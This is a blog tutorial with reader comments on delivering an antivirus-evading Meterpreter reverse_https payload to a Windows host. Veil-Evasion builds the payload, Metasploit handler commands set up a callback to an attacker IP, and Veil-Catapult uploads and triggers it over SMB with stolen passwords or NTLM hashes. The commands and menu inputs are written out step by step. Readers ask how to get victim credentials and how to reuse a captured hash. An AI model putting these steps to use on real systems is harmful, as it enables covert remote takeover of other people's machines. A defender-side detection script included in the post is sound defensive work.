Last time I wrote an article about delivering a payload using PsExec, but Metasploit's psexec module and its stock .exe templates failing and getting caught by AV is a common problem for penetration testers.
The big question is how to upload and execute a payload of our choosing. An excellent tool, SMBexec, accomplishes this by using a patched version of Samba to upload .exe files and trigger them.
We already know about the Veil-Framework; they recently added a payload delivery tool, Veil-Catapult. It works like SMBexec, using Veil-Evasion to generate AV-evading binaries, Impacket to upload or host the binaries, and the passing-the-hash toolkit to trigger execution, optionally from a temporary SMB server.
Hosting the payload this way loads the executable into memory without touching disk, allowing an otherwise disk-detectable executable to bypass detection.
Its EXE delivery integrates seamlessly with Veil-Evasion: we can specify our own custom executable, or drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, we have access to all the latest methods and modules as they are released. After specifying our options and building an executable, we are dropped right back into the Veil-Catapult menu for target information. Another nice feature is that either single IPs or target lists can be used.
So we are now going to create a custom executable using Veil-Evasion and deliver it to the target machine with the help of Veil-Catapult, without getting caught by AV.
First we need to create an undetectable executable using Veil-Evasion. To install Veil-Evasion, follow the previous post, Evading Antivirus.
After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.
# ./Veil-Evasion.py
After executing the Veil-Evasion.py Python script, the Veil window will appear. You can see that today it has 31 payloads:
You can obtain a list of all the payloads with the “list” command:
[>] Please enter a command: list
[>] Please enter a command: use 10
I am going to use the cs/meterpreter/reverse_https payload, so I type “use 10” and press Enter. It loads that component, as shown below:
This HTTPS stager will cause the entire communication path to be encrypted through SSL.
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “80”
Next, I issue the "generate" command and press Enter to create the executable; Veil then asks us for the name of our payload.
We need to set up Metasploit to listen for the Meterpreter reverse HTTPS connection on port 80 (the handler payload must match the reverse_https stager we generated):
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.31.20
msf exploit(handler) > set LPORT 80
msf exploit(handler) > exploit -j
msf exploit(handler) > jobs
It will then show our current job, the reverse_https handler. Now we are going to use Veil-Catapult to deliver our executable over SMB shares on the target.
To install Veil-Catapult, follow the previous post. Once it is installed alongside Veil-Evasion, just run the script inside the Veil-Catapult directory.
# ./Veil-Catapult.py
Veil-Catapult extends the capabilities of the existing Veil framework by using various methods to deliver and trigger payloads across targeted machines. It has the following standalone payload creation techniques:
Powershell Injector
Barebones Python Injector
Sethc Backdoor
But we have already created our executable, so let's move on to the EXE delivery part.
[>] Enter EXE path, or [enter] to use Veil-Evasion: /root/veil-output/compiled/install.exe
[>] Enter a target IP or target list: 192.168.31.2
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
[>] Use pth-[wmis] (default) or pth-[winexe]? winexe
[>] Would you like to [h]ost the .exe or [u]pload it (default)?
[>] Warning: python payloads MUST be uploaded! : u
[>] Press enter to launch:
Above I entered the path of my executable created by Veil-Evasion, the target IP, and the SMB credentials.
Triggering uses the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis does not create a service, but pth-winexe will run as SYSTEM, so which to choose is situation dependent. Payloads can either be uploaded to the victim and triggered there, or hosted on a temporary Impacket SMB server and triggered on the target with a \\UNC path.
The hosted option loads the payload executable into memory without touching disk, allowing otherwise disk-detectable executables to bypass detection.
Whenever an exe is uploaded or hosted and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on the popped hosts.
Finally it executed and we got a Meterpreter session, while the AV is still searching...
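As an added, defender-side example (not from this post or the Veil project): a small Python triage script that turns the two trigger behaviours described above, a remote service installation (the pth-winexe path) and a binary launched from a \\UNC path or via WMI (the pth-wmis path), into detection rules over Windows event records. The key=value export format, host names, share and file paths are all constructed for the example; event IDs 7045 (a service was installed) and 4688 (a new process was created) are the real Windows event IDs.

```python
import re

# Constructed sample events in a simplified key=value export (not log data from the post).
SAMPLE_EVENTS = [
    "EventID=7045 Host=WS01 ServiceName=svc42 ImagePath=svc42.exe Account=LocalSystem",
    "EventID=7045 Host=WS01 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe Account=LocalSystem",
    "EventID=4688 Host=WS01 NewProcessName=\\\\192.168.31.20\\SHARE\\install.exe ParentProcessName=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
    "EventID=4688 Host=WS01 NewProcessName=C:\\Windows\\System32\\notepad.exe ParentProcessName=C:\\Windows\\explorer.exe",
    "EventID=4688 Host=WS02 NewProcessName=C:\\Windows\\install.exe ParentProcessName=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
]

UNC = re.compile(r"^\\\\[^\\]+\\")                 # \\host\share\... (payload hosted on a share)
WRITABLE = re.compile(r"\\(Temp|Users)\\", re.I)   # user-writable drop locations

def parse_event(line):
    """Split 'k=v k=v ...' into a dict (values carry no spaces in this format)."""
    return dict(tok.split("=", 1) for tok in line.split())

def suspicious_service_install(ev):
    """7045 rule: remote service-based execution registers its own service binary."""
    if ev.get("EventID") != "7045":
        return None
    path = ev.get("ImagePath", "")
    if UNC.match(path):
        return "service binary on UNC path"
    if "\\" not in path:
        return "service binary registered by bare filename"
    if WRITABLE.search(path):
        return "service binary in user-writable directory"
    return None

def suspicious_remote_exec(ev):
    """4688 rule: image run from a UNC path, or WMI provider host spawning outside System32."""
    if ev.get("EventID") != "4688":
        return None
    proc, parent = ev.get("NewProcessName", ""), ev.get("ParentProcessName", "")
    if UNC.match(proc):
        return "process image loaded from UNC path"
    if parent.lower().endswith("wmiprvse.exe") and "\\system32\\" not in proc.lower():
        return "WMI-spawned process outside System32"
    return None

def triage(lines):
    """Return (host, event id, reason) for each event that matches a rule."""
    hits = []
    for ev in map(parse_event, lines):
        reason = suspicious_service_install(ev) or suspicious_remote_exec(ev)
        if reason:
            hits.append((ev["Host"], ev["EventID"], reason))
    return hits
```

Running `triage(SAMPLE_EVENTS)` flags three of the five constructed events; the Spooler and notepad records pass as benign.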
Great site, but I've got 2 questions:
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
I'm not sure where we're supposed to be getting these 2 pieces of information from. Are we supposed to get them through recon, or is there an easier way to get them remotely?
It's all about how you enumerated the system and found weak points and improper configuration; that may help you get those things.
Yes, even I have the same question. So are "sathish" and "bhuvi" the username and password of the victim's computer? How can we manage to get our hands on that? And how are we going to find the weak points and improper configuration?
P.S. I’m new to this. Cheers!
It says that it can also use a password hash. I have recovered a password hash for the main user on my test system using Responder, but the password is too complex for John to crack. So can I just use the hash here instead of the password, and do I just paste it in or do I have to specify the file name, etc.?
Also, when I start Veil-Catapult, it gives me this warning:
[!] Warning: install Veil-Evasion for full functionality
But I've already installed it following your instructions, and it is even open in another terminal.
And when I launch Veil-Catapult with the username and password of the Windows system I'm testing on, I get this exception message:
Exception: global name ‘helpers’ is not defined
[!] Error on 192.168.0.6 with credentials :
==>192.168.0.6 is my local IP.
Cheers. Peace.
Hi,
how can I execute remotely?
I have a shared folder with Everyone permission to read and execute.
Thanks
Thanks for such an informative session. The payload has been successfully uploaded and triggered, and it passed the AV test. I have Avast AV installed, by the way. But I am getting stuck at this stage:
[*] Sending stage (770048 bytes) to 192.168.0.104
What could be the issue?